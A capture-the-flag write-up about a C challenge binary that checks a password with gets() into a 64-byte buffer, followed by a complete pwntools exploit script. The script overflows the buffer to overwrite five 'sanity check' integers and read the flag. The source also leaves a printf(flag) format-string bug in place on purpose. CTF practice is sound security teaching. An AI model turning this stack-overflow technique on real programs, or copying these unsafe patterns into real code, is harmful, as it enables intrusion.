I made a program (source) to protect my flag. On the off chance someone does get in, I added some sanity checks to detect if something fishy is going on.
Source
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

/*
 * Challenge binary: reads a "secret word" into a 64-byte stack buffer with
 * gets(), then gates the flag behind five integer locals that must hold
 * fixed values. Both the unbounded gets() and the printf(flag) are bugs.
 * `void main` is non-standard C (should be `int main`). The exploit depends
 * on the compiled frame layout, so the code is left exactly as shipped and
 * only commented.
 */
void main(){
    setbuf(stdout,NULL);
    setbuf(stderr,NULL);
    /* 64-byte buffer; nothing below bounds the input written into it. */
    char password[64];
    /* The "sanity checks". Nothing in this function assigns them after
     * initialisation, so they can only become non-zero through an overflow of
     * password[]. Where they sit relative to password[] (and to the saved
     * frame pointer / return address further up) is decided by the compiler,
     * not by declaration order. */
    int ways_to_leave_your_lover =0;
    int what_i_cant_drive =0;
    int when_im_walking_out_on_center_circle =0;
    int which_highway_to_take_my_telephones_to =0;
    int when_i_learned_the_truth =0;
    printf("Enter the secret word: ");
    /* gets() has no length bound: every byte of the line beyond 64 is written
     * past the buffer, over the ints above and eventually the return address.
     * It is also passed &password (a char (*)[64], not a char *), which only
     * compiles with a warning. */
    gets(&password);
    /* strcmp() stops at the first NUL, so a line of "password123\0<...>" passes
     * this check while the bytes after the NUL still land on the stack. */
    if(strcmp(password,"password123")==0){
        puts("Logged in! Let's just do some quick checks to make sure everything's in order...");
        /* Required values, in declaration order: 50, 55, 245, 61, 17. */
        if (ways_to_leave_your_lover ==50) {
            if (what_i_cant_drive ==55) {
                if (when_im_walking_out_on_center_circle ==245) {
                    if (which_highway_to_take_my_telephones_to ==61) {
                        if (when_i_learned_the_truth ==17) {
                            char flag[128];
                            FILE *f =fopen("flag.txt","r");
                            if (!f) {
                                printf("Missing flag.txt. Contact an admin if you see this on remote.");
                                exit(1);
                            }
                            fgets(flag,128, f);
                            /* Format-string bug: the flag's own bytes are used as the
                             * format string, so any '%' in flag.txt is interpreted.
                             * Should be printf("%s", flag). f is also never fclose()d
                             * (harmless here only because the process returns). */
                            printf(flag);
                            return;
                        }
                    }
                }
            }
        }
        puts("Nope, something seems off.");
    } else {
        puts("Login failed!");
    }
}
Solution
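import sys

from pwn import *

# Exploit for the `checks` binary: gets() lets a long "password" run past the
# 64-byte stack buffer and overwrite the five integer "sanity check" locals, so
# we send the correct password followed by the five expected values.
# Requires pwntools; run with GDB / REMOTE flags as usual for pwntools scripts.


def start(argv=None, *a, **kw):
    """Launch the target according to the pwntools command-line flags.

    ``GDB`` attaches a debugger with ``gdbscript``; ``REMOTE`` connects to the
    ``host port`` given as the script's positional arguments; otherwise the
    binary is run locally. ``argv`` is appended to the program's argv; any
    extra ``*a``/``**kw`` are forwarded to the tube constructor. Returns the
    pwntools tube.
    """
    argv = list(argv) if argv else []  # no shared mutable default
    if args.GDB:
        # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    # Run locally
    return process([exe] + argv, *a, **kw)


def find_ip(payload):
    """Crash the local binary with ``payload`` and return the cyclic-pattern
    offset of the 4 bytes found at the stack pointer in the resulting core.

    Core dumps must be enabled (``ulimit -c unlimited``) because the value is
    read from the core file pwntools collects after ``wait()``. The sendline
    supplies the newline that terminates gets() input. The process is closed
    on every path so a failed run does not leave a stray tube behind.
    """
    # Launch process and send payload
    p = process(exe)
    try:
        p.sendlineafter(b':', payload)
        # Wait for the process to crash
        p.wait()
        core = p.corefile
        # The pattern bytes at SP, not the faulting PC, are used to locate the
        # offset -- presumably because a pattern address is non-canonical on
        # x86-64 and never reaches RIP (the 0x401xxx breakpoints below suggest a
        # 64-bit non-PIE build). Confirm against the core if the offset looks off.
        ip_offset = cyclic_find(core.read(core.sp, 4))
    finally:
        p.close()
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
break *0x401235
break *0x40123f
continue
'''

# Set up pwntools for the correct architecture
exe = './checks'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================

# The NUL terminates the string for strcmp() so the login check passes, while
# gets() keeps copying everything after it until the newline.
password = b"password123\x00"

# Pass in pattern_size, get back EIP/RIP offset, then make it relative to the
# start of password[] rather than to the start of the line.
offset = find_ip(password + cyclic(100))
offset -= len(password)

# Start program
io = start()

# Build the payload: pad up to the five check variables, then write them.
# They are written last-declared first (17, 61, 245, 55, 50) on the assumption
# that in this build each later local sits at a lower address than the previous
# one; the -16 adjustment to `offset` is tied to that same layout. Re-check both
# with the gdb breakpoints above if the binary is rebuilt.
payload = flat([
    password,
    (offset - 16) * asm('nop'),
    p32(0x11),  # when_i_learned_the_truth == 17
    p32(0x3d),  # which_highway_to_take_my_telephones_to == 61
    p32(0xf5),  # when_im_walking_out_on_center_circle == 245
    p32(0x37),  # what_i_cant_drive == 55
    p32(0x32),  # ways_to_leave_your_lover == 50
])

# gets() stops at the first newline, so a 0x0a byte anywhere in the payload
# would silently truncate it; fail loudly instead of debugging a "Nope".
if b'\n' in payload:
    raise ValueError('payload contains a newline byte; gets() would truncate it')

# Save the payload to file
write('payload', payload)

# Send the payload
io.sendlineafter(b':', payload)
io.recvline()

# Get our flag!
flag = io.recv()
success(flag)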